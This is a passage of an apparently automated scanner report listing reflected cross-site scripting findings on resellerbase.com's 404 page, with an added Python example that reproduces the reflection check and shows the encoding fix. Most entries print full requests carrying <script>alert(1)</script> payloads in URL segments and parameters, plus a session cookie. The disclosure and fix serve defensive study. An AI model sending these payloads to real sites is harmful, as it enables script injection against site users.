<p>The requested URL /detail7b4c9<script>alert(1)</script>a524b9df05c/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3044. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6561d<script>alert(1)</script>dfb6f313402 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/426561d<script>alert(1)</script>dfb6f313402/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/426561d<script>alert(1)</script>dfb6f313402/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3045. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 167fd<script>alert(1)</script>58a64847593 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes167fd<script>alert(1)</script>58a64847593/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes167fd<script>alert(1)</script>58a64847593/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3046. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84d6e<script>alert(1)</script>999d72fdd42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos84d6e<script>alert(1)</script>999d72fdd42/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos84d6e<script>alert(1)</script>999d72fdd42/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3047. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 47e37<script>alert(1)</script>682a07430a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images47e37<script>alert(1)</script>682a07430a7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images47e37<script>alert(1)</script>682a07430a7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3048. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cdf71<script>alert(1)</script>eda95a0b384 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/ratingcdf71<script>alert(1)</script>eda95a0b384/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/ratingcdf71<script>alert(1)</script>eda95a0b384/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3049. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1ef7a<script>alert(1)</script>92783dad45c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/search.php1ef7a<script>alert(1)</script>92783dad45c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php1ef7a<script>alert(1)</script>92783dad45c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3050. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b6d0b<a>78a153673eb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb6d0b<a>78a153673eb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb6d0b<a>78a153673eb&opt=2 was not found on this server.</p>
...[SNIP]...

2.3051. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 258f5<a>fab19fd6f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...258f5<a>fab19fd6f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...258f5<a>fab19fd6f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3052. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84c97<script>alert(1)</script>a0b19956e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&84c97<script>alert(1)</script>a0b19956e5b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&84c97<script>alert(1)</script>a0b19956e5b=1 was not found on this server.</p>
...[SNIP]...
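
Every finding in this section is the same reflection: the canary comes back inside the "The requested URL ... was not found on this server." paragraph of a 404 page, and an X-Powered-By: PHP/5.2.14 header on a 404 indicates that page is produced by a PHP error document rather than by Apache's default handler, so the missing encode is in that template, not in a search.php that does not exist at the requested path. The example below is added here and is not code from the report or from resellerbase.com: render_404_vulnerable and render_404_fixed are hypothetical reconstructions of the response body shown above, classify_reflection reproduces the "echoed unmodified" check, and report_confidence maps the outcome onto the Certain/Firm wording the report uses (inferred from the report's text, not the scanner's own rules). All inputs are constructed and it runs offline.

```python
"""Reproduce the reflection check behind the findings above and show the fix.

Added example, not code from the XSS.CX report or from resellerbase.com.
render_404_vulnerable/render_404_fixed are hypothetical: they only mimic the
response body the report shows; the site's real error document was not
available. All inputs are constructed.
"""
import html
import re
from typing import Callable, Optional

# Burp-style canary: a random prefix and suffix around the probe make the
# reflection unambiguous when searching the response body.
PREFIX, SUFFIX = "84c97", "a0b19956e5b"
SCRIPT_PROBE = "<script>alert(1)</script>"  # full PoC, reported as 'Certain'
TAG_PROBE = "<a>"                           # bare tag, reported as 'Firm'

# Request target from finding 2.3052; the canary becomes the name of an
# extra query parameter, as in that finding.
BASE_TARGET = ("/detail/42/themes/kosmos/images/rating/search.php"
               "?keyword=search...&Submit3=Search&opt=2")

# Constructed to match the 404 body in the report (title shortened).
TEMPLATE = ('<html><head><title>Error 404</title></head><body>'
            '<p>The requested URL {url} was not found on this server.</p>'
            '</body></html>')


def make_payload(probe: str) -> str:
    return f"{PREFIX}{probe}{SUFFIX}"


def target_with_param_name(probe: str) -> str:
    """Request target with the canary as the name of an extra query parameter."""
    return f"{BASE_TARGET}&{make_payload(probe)}=1"


def render_404_vulnerable(request_target: str) -> str:
    # The raw request target is interpolated into a text node without HTML
    # encoding, so every path segment and every parameter name or value that
    # reaches this page is an XSS sink.
    return TEMPLATE.format(url=request_target)


def render_404_fixed(request_target: str) -> str:
    # Same template; the untrusted value is HTML-encoded for the text-node
    # context it lands in (quote=True also covers an attribute context).
    return TEMPLATE.format(url=html.escape(request_target, quote=True))


def classify_reflection(body: str, probe: str) -> str:
    """How the canary came back: 'unencoded', 'encoded', 'altered' or 'absent'."""
    if make_payload(probe) in body:
        return "unencoded"   # tags survive intact: the context is exploitable
    m = re.search(re.escape(PREFIX) + "(.*?)" + re.escape(SUFFIX), body, re.S)
    if m is None:
        return "absent"
    # Something sits between the markers: an HTML-encoded copy of the probe
    # means the sink is encoded; anything else means it was filtered/rewritten.
    return "encoded" if html.unescape(m.group(1)) == probe else "altered"


def report_confidence(render: Callable[[str], str]) -> Optional[str]:
    """Map the result onto the report's wording: 'Certain' when the <script>
    PoC is echoed unmodified, 'Firm' when only a bare tag survives, else None.
    This is inferred from the report text, not the scanner's own rules."""
    if classify_reflection(render(target_with_param_name(SCRIPT_PROBE)), SCRIPT_PROBE) == "unencoded":
        return "Certain"
    if classify_reflection(render(target_with_param_name(TAG_PROBE)), TAG_PROBE) == "unencoded":
        return "Firm"
    return None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_404_vulnerable), ("fixed", render_404_fixed)):
        body = render(target_with_param_name(SCRIPT_PROBE))
        print(f"{name}: {classify_reflection(body, SCRIPT_PROBE)}, "
              f"confidence={report_confidence(render)}")
```

The fix is at the sink: render_404_fixed encodes the request target for the text-node context it is written into, after which the same canary comes back as an HTML-encoded copy and no finding would be raised. The classifier keeps "encoded" apart from "altered" on purpose: a response in which the script probe was stripped or rewritten is not evidence of a fix, only that this particular probe did not survive, which is what the Firm findings in this section report for the script probe while the bare tag still came through.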

2.3053. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b8207<a>587b09be20a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b8207<a>587b09be20a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b8207<a>587b09be20a was not found on this server.</p>
...[SNIP]...

2.3054. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3fa22<script>alert(1)</script>2a8bbe813e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3fa22<script>alert(1)</script>2a8bbe813e/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3fa22<script>alert(1)</script>2a8bbe813e/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3055. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 193a4<script>alert(1)</script>bea865d50b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42193a4<script>alert(1)</script>bea865d50b0/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42193a4<script>alert(1)</script>bea865d50b0/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3056. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2eac6<script>alert(1)</script>e69c3985fdd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes2eac6<script>alert(1)</script>e69c3985fdd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes2eac6<script>alert(1)</script>e69c3985fdd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3057. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1e5a<script>alert(1)</script>7507935d8df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmose1e5a<script>alert(1)</script>7507935d8df/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmose1e5a<script>alert(1)</script>7507935d8df/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3058. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 65a52<script>alert(1)</script>9594b809717 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images65a52<script>alert(1)</script>9594b809717/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images65a52<script>alert(1)</script>9594b809717/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3059. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ef6ff<script>alert(1)</script>5671a85ec27 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/search.phpef6ff<script>alert(1)</script>5671a85ec27?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
